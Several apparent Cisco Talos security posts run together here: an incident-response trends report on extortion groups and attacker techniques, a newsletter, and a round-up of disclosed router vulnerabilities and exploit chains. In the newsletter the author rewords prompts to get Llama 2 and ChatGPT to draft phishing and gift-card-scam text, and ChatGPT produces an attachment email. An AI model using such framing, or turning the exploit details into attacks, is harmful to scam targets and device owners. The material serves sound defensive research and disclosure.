Compromised credentials or valid accounts were the top observed means of gaining initial access this quarter, accounting for nearly 40 percent of total engagements. It was challenging to identify how the credentials were compromised considering they were obtained from devices outside the company’s visibility, such as saved credentials on an employee’s personal device.
Continuing the trend from last quarter, healthcare was the most targeted vertical this quarter, making up 22 percent of the total number of incident response engagements, closely followed by financial services.
Data theft extortion on the rise, featuring Clop, Karakurt and RansomHouse
Data theft extortion was the top observed threat this quarter, accounting for 30 percent of threats Talos IR responded to, a 25 percent increase in data theft extortion incidents compared to last quarter. The rise in data theft extortion incidents compared to previous quarters is consistent with public reporting on a growing number of ransomware groups stealing data and extorting victims without encrypting files and deploying ransomware.
Data theft extortion is not a new phenomenon, but the number of incidents this quarter suggests that financially motivated threat actors are increasingly seeing this as a viable means of receiving a final payout. Carrying out ransomware attacks is likely becoming more challenging due to global law enforcement and industry disruption efforts, as well as the implementation of defenses such as increased behavioral detection capabilities and endpoint detection and response (EDR) solutions.
This quarter featured activity from the RansomHouse and Karakurt extortion groups for the first time in Talos IR engagements. Active since 2021, Karakurt typically gains access to environments via valid accounts, phishing, or exploiting vulnerabilities. In one observed Karakurt data theft extortion engagement, the attackers hijacked a remote desktop protocol (RDP) account, enumerated domain trusts using the network administration command-line tool nltest, executed PowerShell scripts to recover passwords, and modified domain policies.
RansomHouse has been active since late 2021 and is known for gaining access to corporate environments by exploiting vulnerabilities. In a RansomHouse engagement, the adversaries used non-interactive sessions to bypass multi-factor authentication (MFA), carried out a DCSync attack to collect credentials from a domain controller, and abused remote services such as secure shell (SSH) and RDP to move laterally. A DCSync attack occurs when attackers use various commands in Microsoft Directory Replication Service (DRS) Remote Protocol to masquerade as a domain controller to acquire user credentials from another domain controller. An attacker first needs to compromise a user account with domain replication privileges, which are typically domain admins.
Some ransomware groups, such as BianLian and Clop, are reportedly shifting away from using encryption, favoring data theft extortion in recent attacks, according to public reporting. Although Talos IR did not respond to any BianLian incidents this quarter, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) published a joint advisory on May 16 with the FBI and the Australian Cyber Security Centre (ACSC) confirming that as of January, the BianLian group stopped conducting ransomware operations in favor of performing exfiltration-based data theft extortion. BianLian group’s shift from deploying ransomware may also be due to the release of a free decrypter for BianLian ransomware in January 2023, possibly prompting them to pursue alternate methods. It is possible BianLian determined they could be successful without the use of data encryption in their operations.
Active since February 2019, the Clop group started as a ransomware-as-a-service (RaaS) operation with an affiliate program that relied on the double extortion technique involving stealing and encrypting data. With the rise in data theft extortion incidents this quarter, it is possible the trend will continue, with other groups who primarily deploy ransomware shifting to data theft extortion as a primary means of receiving a payout.
In a Clop data theft extortion engagement this quarter, the adversaries gained initial access by exploiting a zero-day remote code execution (RCE) vulnerability in the Forta GoAnywhere managed file transfer (MFT) application, tracked as CVE-2023-0669. Notably, the affiliate did not deploy ransomware and only conducted data theft extortion upon exfiltrating victim information. The Clop ransomware group has a history of mass exploitation of zero-day vulnerabilities in campaigns targeting file transfer applications, affecting hundreds of companies globally. This includes several zero-day vulnerabilities in the Kiteworks, formerly Accellion, file transfer application (FTA), tracked as CVE-2021-27101, CVE-2021-27102, CVE-2021-207103, and CVE-2021-27104, and a SQL injection vulnerability in the Progress Software’s MFT application known as MOVEit Transfer, tracked as CVE-2023-34362. U.S. law enforcement has taken notice and increased pressure on the group, offering a $10 million dollar reward for information on the identification or location of Clop members.
It is highly unusual for a ransomware group to consistently exploit zero-day vulnerabilities, given the resources required to develop such exploits, possibly suggesting that the Clop ransomware group possesses a level of sophistication and funding matched only by advanced persistent threats (APTs). Given the group’s incorporation of zero-days in MFT applications in recent attacks, and the group’s perceived success in affecting hundreds of organizations, Clop is likely to target MFT applications in the future.
Ransomware
Ransomware accounted for 17 percent of the total number of engagements responded to in Q2 2023 (April - June), a slight increase compared to 10 percent last quarter. 8Base and MoneyMessage ransomware operations were observed for the first time this quarter, in addition to the previously seen ransomware operations LockBit and Royal.
First discovered in March 2022, 8Base is a ransomware group/operation that uses a customized version of Phobos ransomware and steals data prior to encryption. Although the group has been around for over a year, it started gaining increasing popularity in June 2023 after a significant spike in activity.
In an 8Base ransomware engagement, the legitimate remote desktop application AnyDesk was installed in the Performance Logs (Perflogs) directory, potentially as a way to evade detection. The Perflogs folder is a system-generated folder that stores information about the performance of the device. The attackers were also observed dumping credentials from the Local Security Authority Subsystem Service (LSASS) memory, creating new processes with an existing user token to bypass access controls, escalating privileges using the runas command, and using the Windows command shell to execute PowerShell scripts.
MoneyMessage is a fairly new ransomware operation that was first discovered in March 2023. Similar to 8Base, the MoneyMessage ransomware group operates under the double-extortion model. MoneyMessage is a ransomware family written in the C++ programming language and uses the Elliptic Curve Diffie-Hellman (ECDH) key exchange and ChaCha stream cipher algorithm for encryption, both of which are commonly used by ransomware families.
Talos IR responded to a MoneyMessage ransomware attack where the MoneyMessage encryptor was dropped in the Netlogon directory allowing for the deployment of the ransomware to multiple hosts. Prior to executing ransomware, the attackers also uninstalled various security tools, such as EDR solutions, via PowerShell scripts to impair defenses.
Initial vectors
In the majority of the engagements Talos IR responded to this quarter, adversaries gained initial access by abusing compromised credentials to access valid accounts. The use of valid accounts was observed in nearly 40 percent of the total engagements, a 22 percent increase from Q1 2023.
It is difficult to say how adversaries obtained the compromised credentials used to access valid accounts. There are a number of ways credentials can become compromised, such as third-party data breaches, information-stealing malware such as Redline, and phishing campaigns. This is especially true if employees reuse credentials across multiple accounts, highlighting the importance of using strong password policies and enabling MFA across critical servers.
Security weaknesses
A lack of MFA or improper MFA implementation across critical services played a part in over 40 percent of the engagements Talos IR responded to this quarter. Talos IR frequently observes attacks that could have been prevented if MFA was enabled on critical services, such as VPNs. In nearly 40 percent of engagements, attackers were able to abuse compromised credentials to access valid accounts, 90 percent of which did not have MFA enabled. In some engagements, adversaries were able to bypass MFA with MFA exhaustion/fatigue attacks.
MFA exhaustion attacks occur when an attacker attempts to repeatedly authenticate to a user account with valid credentials to overwhelm victims with MFA push notifications, hoping they will eventually accept, allowing the attacker to successfully authenticate into the account. Identification and user education are key parts of countering MFA bypass techniques. Organizations should ensure employees are aware of who to contact in these situations to determine if the event was a technical issue or malicious in nature.
Talos IR recommends disabling VPN access for all accounts that do not have MFA enabled. Additionally, Talos IR recommends expanding MFA for all user accounts (e.g., employees, contractors, business partners, etc.). Talos IR has repeatedly seen attackers targeting vendor and contractor accounts (VCAs), which typically have expanded privileges and access. VCAs are often overlooked during account audits due to trust placed in the third party, making them an easy target for attackers. Talos IR recommends disabling VCAs when they are not needed, implementing least privilege access, and validating that logging and security monitoring are enabled for VCA accounts.
Talos IR also recommends organizations perform a password audit across all user and service accounts to ensure complexity and strength are aligned with the industry best practices per account type (e.g., privilege, service, user, etc.) to prevent password enumeration techniques, such as password spraying.
Top-observed MITRE ATT&CK techniques
The table below represents the MITRE ATT&CK techniques observed in this quarter’s IR engagements, which includes relevant examples and the amount Talos IR saw in engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note this is not an exhaustive list.
Key findings from the MITRE ATT&CK framework include:
The use of valid accounts was the top observed initial access technique, accounting for nearly 40 percent of the total number of engagements.
Observed in over 50 percent of engagements this quarter, PowerShell is a dynamic command line utility that continues to be a popular utility of choice for adversaries likely for a number of reasons including stealth, convenience and vast IT administration capabilities.
In 26 percent of engagements this quarter, Talos IR observed attackers abusing remote services, such as RDP and SSH, to facilitate lateral movement.
The top persistence mechanism observed this quarter was the abuse of Windows Task Scheduler to create scheduled tasks, allowing adversaries to execute programs or commands at scheduled times or at system startup.
Tactic
Technique
Example
Initial Access (TA0001)
T1078 Valid Accounts
Adversary leveraged stolen or compromised credentials.
Execution (TA0002)
T1059.001 Command and Scripting Interpreter: PowerShell
Executes PowerShell code to retrieve information about the client’s Active Directory environment.
Persistence (TA0003)
T1053.005 Scheduled Task/Job: Scheduled Task
Scheduled tasks were created on a compromised server to execute malware during startup.
Defense Evasion (TA0005)
T1562.001 Impair Defenses: Disable or Modify Tools
Uninstall security tools to evade detection.
Credential Access (TA0006)
T1003.006 OS Credential Dumping: DCSync
Use DCSync attack to gather credentials for privilege escalation routines.
Lateral Movement (TA0008)
T1563.002 Remote Services Session: RDP Hijacking
Adversary compromised an existing user’s Remote Desktop Protocol session.
Welcome to this week’s edition of the Threat Source newsletter.
When I first started poking at ChatGPT a few months ago, I quickly learned that it wasn’t quite ready to take my job (yet) and wasn’t staying up to date on wrestling.
Since ChatGPT went viral, several other companies have released their own versions of AI assistants who can answer questions, perform text-based tasks and more. Meta most recently entered the AI race with Llama 2, an open-source version of their chatbot. IBM has also re-branded its watson tool (formerly known as capital “W” Watson who was really good at “Jeopardy”) to be a ChatGPT-like.
Security researchers have long warned about the dangers these tools pose to the security space, specifically because it makes it easier for bad actors to create convincing spam campaigns, phishing emails and scripts anyone could follow in a voice phishing (“vishing”) attack.
Out of my own personal curiosity, I wanted to try Llama 2 out. I had to enlist the help of some third-party open-source tools to make it easier for me to use Llama 2, but I quickly got it running and went right to work as a hypothetical bad guy looking to start sending spam emails.
I’ve recently become interested in the topic thanks to “Behind the Bastards,” one of my favorite podcasts. Robert Evans, the host of the show, has done some great reporting over the past month on AI-generated cons and spam, specifically how they affect the elderly.
I tried several different prompts with different wordings (trying omitting and including specific words like “phishing,” “scam” and “spam”) but I couldn’t quite talk Llama 2 into writing something for me. Instead, I repeatedly received several warnings about how the questions violated the model’s terms of service and the overall threat of spam and phishing and its negative effects on its targets.
In one example, I gave Llama 2 the prompt, “Write a letter to my boss asking her to immediately download and install an attached file to view my latest analytics report,” which is a legitimate thing I would send her in my everyday activities.
Instead, the chatbot suggested I use a “secure and trusted platform” instead of an email attachment to send the report and said it “goes against ethical and responsible AI practices to encourage or assist with the download or installation of files from unverified sources.”
Using that same prompt in ChatGPT, I received no pushback and instead got an email template that was a bit more formal than I’d usually push for in my emails, but nonetheless, I got an email that was easily customizable and repeatable asking the user to download an attachment.
Llama 2 gave me similar warnings when I asked it to write a script for me to ask my grandmother to purchase me an Amazon gift card because I was in a bind.
ChatGPT took the word “script” very literally in my ask to it, instead producing what looked like it belonged in a mid-day television show instead of a phishing attempt.
I commend Meta for seeming to have tighter restrictions on the types of asks users can make to its AI model. But, as always, these tools are far from perfect and I’m sure there are scripts that I just couldn’t think of that would make an AI-generated email or script more convincing. This is a topic I plan on looking into more, and if you have any ideas about things we could ask AI chat models to do, feel free to DM us on Twitter.
The one big thing
Bad actors are having to change up their tactics to steal login credentials and authorization attempts as the internet at large moves away from text-based passwords. Talos researchers wrote this week that they anticipate passwords may disappear in the not-too-distant future, leaving actors likely to shift away from basic phishing or other attacks that target passwords, toward post-authentication session theft or the weaker registration, recovery and revocation processes. Although it will likely take several years for passwordless authentication to become widely adopted, and it is likely that passwords will be around for a long time, some of the most popular and most targeted applications may adopt it in the near future. Removing passwords from even a few dozen key web applications is likely to affect the threat landscape.
Why do I care?
Many of the passwords that attackers are currently harvesting will be rendered obsolete with the adoption of passwordless authentication. This may cause changes to the malware landscape and cybercriminals’ business models built around selling access to compromised accounts. This means new tactics, attack vectors and methods that attackers try to use to steal things like session IDs and MFA push notifications.
So now what?
Looks for security companies and technology vendors to develop new standards that focus on the protection of web services. Even though these new types of attacks are likely to pop up, using passkeys or a passwordless approach to security is still preferable to any “traditional” login methods.
Top security headlines of the week
A North Korean state-sponsored actor was behind a recent supply chain attack on a cloud IT provider it used to target cryptocurrency companies. JumpCloud, the target of the attack, disclosed that the attack affected less than five of its customers and fewer than 10 devices. The campaign may indicate a pivot among North Korean actors to move away from direct attacks designed to steal cryptocurrency in favor of stealthier supply chain attacks. These actors typically carry out attacks to generate funds for the country’s reclusive regime and its controversial nuclear weapons program. Mandiant, one of the security firms who helped investigate the attack, said the group responsible worked for North Korea's Reconnaissance General Bureau (RGB), its primary foreign intelligence agency. North Korean actors targeted the 3CX softphone application in a similar supply chain attack earlier this year. (Reuters, Axios)
The Biden administration announced a new program to include a physical label on internet-of-things products that meet certain cybersecurity criteria. The new “U.S. Cyber Trust Mark,” created by the National Institute of Standards and Technology, will soon start appearing on smart home devices that meet the preset list of standards for the way the device stores information and makes other connections to the user’s network. Connected appliances found in users’ homes, like “smart” refrigerators, microwaves and televisions, will be among the first products to receive the label in partnership with major retailers and manufacturers. “Smart fitness trackers,” presumably to cover things like smart watches, were also mentioned in the Biden administration’s announcement. (CBS News, The Verge)
The U.S. Securities and Exchange Commission formally adopted new rules Wednesday regarding how quickly American companies must disclose cyber attacks. Public companies now have four days within the discovery of a cyber attack to determine if it had a material effect on its operations, and then disclose that determination to the public. However, companies can receive an extension to this deadline if disclosure of the attack would pose a significant risk to national security or public safety, as determined by the U.S. attorney general. These companies will also have to publish the processes they have in place to manage material risks from cybersecurity incidents. The new policies have been hotly debated for more than a year since they were initially announced. (MarketWatch, Bloomberg)
Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.
Most prevalent malware files from Talos telemetry over the past week
During that research, Talos has worked with vendors to report and mitigate these vulnerabilities, totaling 141 advisories covering 289 CVEs across multiple routers.
Talos is highlighting some of the major issues our researchers discovered over the past several years, including vulnerabilities that an attacker could mostly directly access or those an adversary could chain together to gain elevated access to the devices.
There are several Snort rules that can detect possible exploitation of the vulnerabilities included in this post.
Small office/home office (SOHO) routers and small-scale industrial routers are fairly common targets for bad actors because these devices are nearly in every home and small business. Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices.
The Talos Vulnerability Discovery and Research Team — our world-class team of researchers who work with third-party vendors to disclose and patch vulnerabilities in a variety of software and hardware — made SOHO and industrial routers a major priority after VPNFilter. By helping vendors mitigate the vulnerabilities on these devices, we make life harder for malicious actors.
Since VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. As a direct result of this research, Talos has reported 289 CVEs to vendors, published across 141 Talos reports. These reports resulted in appropriate Snort network intrusion detection coverage and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.
In this blog post, we provide a summary of the vulnerabilities we discovered in these devices, specifically focusing on vulnerabilities adversaries were most likely to exploit, or ones that could be chained together to gain an elevated level of access to the device or network. This is by no means the end of our research into SOHO or industrial routers. We plan to continue investigating these types of devices to better protect our customers and the community as a whole.
Routers
ASUS RT-AX82-U
Research conducted by Lilith Wyatt.
Background
Our researchers chose to examine the ASUS RT-AX82-U because it is a very popular router and it shares a codebase with a plethora of other ASUS routers. Over the course of the research, Talos submitted three unique reports to ASUS, resulting in three CVEs. The ASUS RT-AX82-U contains a large amount of open-source code in the form of the asus-merlin-ng firmware. During this research, this section of code was avoided in favor of device- and feature-specific codebases within the device, including smart home integrations and the AiMesh functionality. The smart home integration features are designed for integration with Amazon Alexa or the “If This, Then That” (IFTTT) automation framework to provide more easily accessible functionality or automation. The AiMesh feature is a mesh networking solution designed to allow for multiple routers to work together to provide Wi-Fi connectivity over a larger area from a single network connection point. These features are enabled by default in the stock configuration of the device. This means that, without explicit effort by a user to disable these features, all ASUS RT-AX82-U devices could be targets.
Notable Vulnerabilities
TALOS-2022-1586: This vulnerability existed in the smart home integration features of the router. If a user ever generates a token to use with IFTTT, an authentication token is generated to allow functionality to be leveraged on the router. This token can be easily brute-forced, as there are only 255 possible combinations, and the validity is measured based on when the token was generated and the device's uptime. This means if the router is rebooted, this vulnerability is exploitable up until the time (in seconds from reboot) the token was originally created, instead of the intended two-minute timeout. Leveraging this vulnerability allows an attacker to gain administrative privileges on the router as if they were properly authenticated.
TALOS-2022-1590: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication control messages, an improperly sized read can be used to leak information that can be decrypted locally based on known plaintext. This is possible because the provided length of a user-supplied AES key, which needs to be a set size based on the AES variant used (in this case AES-256), is not checked. By providing a key smaller than the required size, extra information can be returned to the user.
TALOS-2022-1592: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication diagnostic messages, an improperly sized packet can lead to a denial of service. This is possible due to the lack of length validation on packets ingested, which leads to an integer underflow. This integer underflow is then utilized in a read loop that ends in accessing unmapped memory, causing a crash.
Observations
The primary issue in the Asus RT-AX82-U came from the inclusion of services that do not necessarily need to be activated by default. The smart home integration service should be disabled by default, as it is by no means required for the operation of the router and likely is not utilized in most scenarios. The AiMesh service could be disabled by default and only enabled if a user wants to utilize a mesh network. While disabling this functionality would not have removed the vulnerabilities from the device, it would significantly reduce the attack surface as well as reduce the number of deployments that had devices in vulnerable states.
D-Link DIR-3040
Research conducted by Dave McDaniel.
Background
The D-Link DIR-3040 is another popular device and was an interesting subject for our researchers because of the mesh communications used between nodes to provide improved Wi-Fi coverage wherever the device is deployed. Over the course of the research, Talos submitted six unique reports to D-Link, resulting in six CVEs. The research targeting the D-Link DIR-3040 focused on all aspects of the device in a stock configuration of the device. This included the web services — including hidden diagnostic services — and Wi-Fi mesh networking implementation, as well as other general security issues. The Wi-Fi mesh networking implementation allows for multiple routers to connect together to provide increased network coverage.
Notable Vulnerabilities
TALOS-2021-1284: This vulnerability was a combination of web server functionality and an issue within hidden functionality. By visiting a hidden URL of the router, an attacker could activate a hidden telnet console used for diagnostics. Within this diagnostics menu, multiple commands within the restricted shell lacked proper input sanitization and, as such, allowed arbitrary command injection.
TALOS-2021-1361: Talos discovered this vulnerability within the Wi-Fi mesh networking service enabled by default on the device. By utilizing hard-coded credentials, an attacker could connect to the MQTT server. Once connected, an attacker could query information about the mesh. This information was encrypted but could be decrypted utilizing the MAC address of the base router, which was found in the same message. Once decrypted, the root password for the primary router could be recovered.
TALOS-2021-1281: Talos discovered this vulnerability within the Zebra network management service which was enabled by default on the router. By utilizing hard-coded credentials for this service, an attacker could access diagnostic tooling for the router. An adversary could change the service login banner to a file to leak sensitive information otherwise inaccessible via this service.
Observations
The DIR-3040 web server contains hidden paths to access debugging functionality on the device. There is no reason to hide this functionality, and it is better off as an explicit option that a user has to manually enable. Hard-coded credentials should also never be included in modern devices. Finally, as with the RT-AX82-U, the MQTT server related to mesh communication should not be enabled unless a feature that requires the MQTT server is enabled by a user during setup or other configuration.
InHand Network InRouter 302
Research conducted by Francesco Benvenuto.
Background
Our researchers examined the InHand Network InRouter 302 because three ATM providers claimed to have used this device: Wireless ATM STORE.COM, Wincor Nixdorf and UnionPay. Over the course of the research, Talos submitted 23 unique reports to InHand, resulting in 25 CVEs. The research targeting the InHand Network InRouter 302 focused on all aspects of the device in a stock configuration of the device. This included the web server, API services and general security issues. The web server contained multiple vulnerabilities, including cross-site scripting and common gateway interface (CGI) issues. The console utilities of InRouter also contained numerous vulnerabilities. During the course of this research, an interesting unescape vulnerability was identified that spanned numerous open-source projects and closed-source products. This vulnerability will be discussed more in-depth in the Siretta router section.
Notable Vulnerabilities
TALOS-2022-1469: This vulnerability existed in the HTTP server. It exploits the /info.jsp endpoint, which is normally only used by web pages themselves. The endpoint will effectively evalthe parameter sent as a Javascript command. Because the endpoint is not limited in access, this leads to a cross-site scripting (XSS) vulnerability.
TALOS-2022-1472: This vulnerability existed in the HTTP server. Because of improper access control, a low-privileged user could update the router configuration, enabling them to change to privileged user credentials, resulting in privilege escalation.
TALOS-2022-1476: The vulnerability existed within the restricted console presented to a user when using SSH or Telnet. This console contained multiple commands, including factory, a command that only the most-privileged user could execute. By utilizing this command, an attacker could use this (presumed) debug functionality to overflow the stack buffer used to hold the user data while it was being parsed. This vulnerability could lead to arbitrary code execution.
Observations
These three vulnerabilities would allow an attacker to obtain root access to the device starting with a single click. TALOS-2022-1469 is an XSS vulnerability that could allow an attacker to exfiltrate the session cookie of a logged-in user. If the session cookie belonged to a low-privileged user, an attacker could chain TALOS-2022-1472 to update the router’s configuration, enabling them to change privileged user credentials, resulting in privilege escalation. An attacker, at this point, would have the most elevated permitted credentials, but no root access. However, by exploiting TALOS-2022-1476, an attacker would be able to obtain, through a stack-based buffer overflow, remote command execution.
We wrote an extensive blog post that discusses, in-depth, how an attacker could chain the vulnerabilities discovered to obtain remote command execution in the InHand Network InRouter 302 with a one-click attack.
Linksys E Series
Research conducted by a researcher within Cisco Talos.
Background
The Linksys E Series devices were directly affected by the VPNFilter campaign. The E1200 and E2500 are two SOHO routers offered by various vendors over the years, most recently Linksys. The devices target low-budget installations, providing four Ethernet ports for additional device connections. The E Series provides a web-based management console to allow owners to make administrative changes to the system configuration. This web console also provided the main attack surface during our analysis of the device.
Notable Vulnerability
TALOS-2018-0625: This disclosure contains three related authenticated command injection vulnerabilities, all accessible via the web-based management portal. Many of the configuration details passed to E Series routers during configuration must be retained across a device’s power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. Three paths exist where one of two parameters, `machine_name` or `wan_domain`, are retrieved from NVRAM and subsequently used directly in a command passed to `system()`.
Milesight UR32L and MilesightVPN
Research conducted by Francesco Benvenuto.
Background
The Milesight UR32L is an industrial router that offers a good tradeoff between price and functionalities. The vendor also provides software for a remote access solution called MilesightVPN which, theoretically, allows the UR32L to be less exposed, thus making it more difficult for an attacker to target it. Over the course of the UR32L research, Talos submitted 17 unique reports to Milesight, resulting in 63 CVEs. Talos researchers also sent Milesight five unique reports for the VPN solution, resulting in six CVEs. This research focused mainly on two components: its HTTP server with its related components and the router console shell. Our analysis also considered the attack scenario in which the user is using Milesight's MilesightVPN, so as to investigate a more complete attack scenario.
Notable Vulnerabilities
TALOS-2023-1701: This vulnerability existed in the HTTP server login functionality of the MilesightVPN. This is an SQL injection vulnerability that would allow an attacker to bypass the web login and grant access to the administrative web pages. This in turn allows an attacker to communicate with routers connected to the VPN.
TALOS-2023-1697: This vulnerability existed in the HTTP server login functionality of the UR32L. This is the most severe vulnerability found on the router. Indeed, it is a pre-authentication remote stack-based buffer overflow. An unauthenticated attacker able to communicate with the HTTP server would be able to perform remote command execution. One way to communicate with the HTTP server remotely is by using TALOS-2023-1701.
TALOS-2023-1706: The UR32L offers different diagnostic functionalities within its HTTP server, like ping and trace. Both of these vulnerabilities have an OS command injection vulnerability through the specified host. An attacker with low-privilege credentials in the UR32L could exploit these vulnerabilities and execute remote commands.
Observations
The vendor provides MilesightVPN software, a remote access solution. The underlying idea is that by using this software, Milesight’s UR32L would not need to be exposed to the internet, thus reducing the attack surface and making it more difficult for an attacker to target it. During our research, we took into consideration this scenario and demonstrated that unfortunately, an attacker can use TALOS-2023-1701 to attack the remote access solution software and then execute arbitrary code inside the UR32L by using TALOS-2023-1697.
Netgear Orbi Router RBR750/RBS750
Research conducted by Dave McDaniel.
Background
The Netgear Orbi RBR750/RBS750 was chosen due to its popularity and reputation of quality. This device is widely adopted as a high-end SOHO router choice and also utilizes a mesh network to connect satellites. Over the course of the research, Talos submitted four unique reports to Netgear, resulting in four CVEs. This research of the Netgear Orbi Router RBR750 focused on multiple services across the devices, such as the management web server and services provided by the device on the local network. The network services included hidden functionality that could be activated using a special network packet. The Orbi utilizes the open-source OpenWrt ubus code base for communication between the satellites and primary router, but also includes hidden additional functionality on top of this library.
Notable Vulnerabilities
TALOS-2022-1595: This vulnerability is based on the existence of an undocumented service listening on UDP port 23. This service listened for an encrypted packet containing the MAC address, username and password of the br-lan interface of the device. The encryption used was a modified blowfish algorithm similar to those used for the Nintendo DS handheld video game system’s cartridge copyright protection. Once the packet was retrieved, a telnet daemon was spawned which allowed direct access to the underlying busybox system.
TALOS-2022-1596: This vulnerability existed in the web-based administration of the Orbi. Within the web interface, there was functionality to block specific devices specified by MAC address and device name. The device name field of the associated POST request is vulnerable to command injection due to a lack of user-input sanitization. An attacker could craft a malicious packet to execute arbitrary commands on the device with root privileges.
TALOS-2022-1592: This vulnerability existed in the Wi-Fi mesh communication service of the device. This service utilized the open-source library, developed by OpenWrt, ubus. More specifically, this vulnerability was due to functionality Netgear built on top of the ubus library. If an attacker had knowledge of the web interface password or the default password, it would be possible to send a ubus message to activate a hidden telnet service. This hidden telnet functionality could then be used by an attacker to obtain direct access to the underlying busybox system.
Observations
The Netgear Orbi mainly suffered from a lack of user input sanitization and the presence of hidden services. User input should be sanitized server-side using well-tested libraries instead of one-off solutions, or worse, client-side solutions. Providing a telnet service is not inherently bad, but hiding the activation from a user does not seem to provide value. Including hidden ways of activating the telnet server makes it more difficult for a user to know how to minimize their risk.
Robustel R1510
Research conducted by Francesco Benvenuto.
Background
The Robustel R1510 was chosen due to the physical danger vulnerabilities could present. This router is used in physical systems such as elevators, and Robustel partners with many wide-reaching industrial control system vendors such as Vodafone, Bosch, Siemens, Emerson and Schneider Electric. Over the course of the research, Talos submitted 10 unique reports to Robustel, resulting in 26 CVEs. Research on the Robustel R1510 was primarily focused on the web server, which manages almost all functionality of the device.
Notable Vulnerabilities
TALOS-2022-1577: This vulnerability was contained within the web server and the functionality directly associated with installing a NodeJS application. While uploading a new NodeJS application, a global variable is set with the provided filename as part of the POST request. Once the file is uploaded to the web server, a second request is required to install the application. Using this request, it was possible for an attacker to trigger a command injection by crafting a maliciously named file. Once the application was installed, the command injection would be triggered. This allowed an attacker to execute arbitrary commands on the device.
TALOS-2022-1576: Talos discovered this vulnerability within the firmware upgrade functionality found within the web server. The R1510 utilized a modified U-Boot header but maintained the presence of the character array used for the firmware name. This field was not validated or escaped before being used directly in the function call system. An attacker could use this to craft a firmware update file that would result in arbitrary command injection during the update process.
TALOS-2022-1578: Talos discovered this vulnerability within the SSH-authorized key uploading feature within the web management interface of the R1510. An authenticated user could change their Linux username on the device. This created a directory path for the SSH keys used in certificate-based authentication. When a user uploaded a new SSH key, their username was used directly, without any validation, to build a directory path that was passed into a sysprintf function call, which would result in a command injection. An attacker could leverage a vulnerability to bypass authentication in the web interface, then continue to leverage this vulnerability to execute arbitrary commands within Linux.
Observations
Most of the discovered vulnerabilities in the Robustel R1510 were related to a lack of user input sanitization. Ideally, a common code base would be used for many instances of checks across the device. If there was no specific performance requirement, these checks would occur multiple times throughout the process of uploading files and utilizing previously uploaded files. Using a common library to perform these checks would negate the risk of validation falling out of sync with checks elsewhere in the system.
Sierra Wireless Airlink
Research conducted by Carl Hurd.
Background
Talos researchers chose to investigate the Sierra Wireless Airlink because of its deployment flexibility. The AirLink is intended for use in remote locations utilizing a cellular connection for local devices. The AirLink is managed out-of-band from the network provided by the device. Talos submitted 11 unique reports to Sierra Wireless, resulting in 13 CVEs. The research was focused on all aspects of the device, including the web server, custom console binary, SNMP and other exposed services on the device. If an attacker were to compromise this device, it would be possible to leverage the functionality of the device to manipulate traffic on all sides of the network.
Notable Vulnerabilities
TALOS-2018-0751: This vulnerability is contained within the web server ACEManager, which lacked a cross-site request forgery prevention header. These headers allow the server to check that requests are coming from a similar session in a coherent manner, instead of coming from a link of an unrelated browser capitalizing on a pre-authenticated session. This vulnerability allows for the possibility of session hijacking using various methods.
TALOS-2018-0750: This vulnerability existed in the ping_result.cgi binary, which did not properly filter input before reflecting it back to the client. This improper filtering allowed JavaScript to be injected into the response to the client. This could be used to run code on the client's browser, such as making requests on behalf of the user or disclosing confidential tokens. Using this vulnerability in addition to TALOS-2018-0751 allowed for complete session hijacking of an authenticated user.
TALOS-2018-0748: Talos discovered this vulnerability within the file upload capability of templates within the AirLink 450. When uploading template files, a user can specify the name of the file being uploaded. There were no restrictions to protect the files currently on the device and used for normal operation. If a file was uploaded with the same name as a file that already existed in the directory, it inherits the permissions of that file. In this case, multiple CGI files could be overwritten with execute permissions. After replacing the file, an adversary could navigate to the newly uploaded CGI binary, and the code would be executed. By leveraging TALOS-2018-0751 and TALOS-2018-0750, the adversary could hijack an authenticated session of a user after uploading malicious code and executing it on command. This would result in fully unauthenticated remote code execution.
Observations
Most of the findings on the Airlink 450 centered around the web server and the basic functionality it provides. The lack of CSRF tokens provided by the web server and the reflected XSS vulnerability allows authenticated requests to be made by hijacking a user’s session. A well-developed and tested web server should include CSRF automatically. The XSS can be mitigated by utilizing JavaScript libraries, or sanitization libraries if using CGI binaries, to sanitize user input properly. Finally, file upload functionality should be strictly limited to a folder that only contains user-uploaded files, to avoid permissions issues or file overwrites that could be used maliciously.
Siretta QUARTZ-GOLD
Research conducted by Francesco Benvenuto.
Background
The Siretta QUARTZ-GOLD was included in this research because the device is often deployed near critical devices, giving vulnerabilities an increased level of urgency. The device has a 4G/LTE failover mechanism for network uptime, which likely means the router is deployed on critical networks. Over the course of the research, Talos submitted 14 unique reports to Siretta, resulting in 62 CVEs. The research of the Siretta QUARTZ-GOLD explored all aspects of the router that were accessible by default. This included the HTTP server, SNMP server implementation, and various command line interface (CLI) tools. The majority of the router firmware is a fork of FreshTomato, which is an open-source router firmware. By utilizing this firmware, the QUARTZ-GOLD inherits a code reuse vulnerability from the project, just as many other projects that utilize the open-source codebase.
Notable Vulnerabilities
TALOS-2022-1638: This vulnerability existed in the M2M feature of the QUARTZ-GOLD. When the M2M feature was enabled, the m2m binary was executed. This binary offered rich functionality through a custom UDP protocol, including a function called “DELETE_FILE”, which would allow execution of the rm -rf <base_folder>/<M2M_data_entry.data> & command through the systemfunction. The M2M_data_entry.data portion of the command was specified in the UDP packet without any parsing or sanitization on the M2M_data_entry.data string. This functionality was vulnerable to command injection. Furthermore, the DELETE_FILE functionality did not require authentication. An unauthenticated attacker could use this vulnerability to achieve arbitrary command execution.
